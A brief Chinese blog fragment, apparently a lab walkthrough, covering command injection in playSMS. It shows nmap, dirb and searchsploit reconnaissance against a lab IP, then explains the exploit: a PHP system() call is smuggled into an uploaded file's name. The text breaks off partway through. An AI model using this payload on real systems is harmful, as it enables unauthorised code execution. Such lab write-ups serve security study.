赞
踩
其实命令注入漏洞也叫命令行注入漏洞,此漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入的参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。
链接:https://pan.baidu.com/s/1W8kgkYPrHchakwy9kU6g7A
提取码:9mm5
netdiscover -i eth0
nmap -sV 192.168.101.46
dirb http://192.168.101.46
searchsploit playSMS
cat /usr/share/exploitdb/exploits/php/webapps/42003.txt
这个漏洞的利用原理是:用户上传backdoor.php文件给服务器,服务器并不会执行该php里面的内容,因为服务器只读取到文件的名字而已,但是只要把backdoor.php改为<?php system('uname -a');dia();?>.php的话,服务器就会执行该文件名字的代码,其实就是一个代码执行的漏洞
7. 登录进去漏洞验证的URL网址中
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。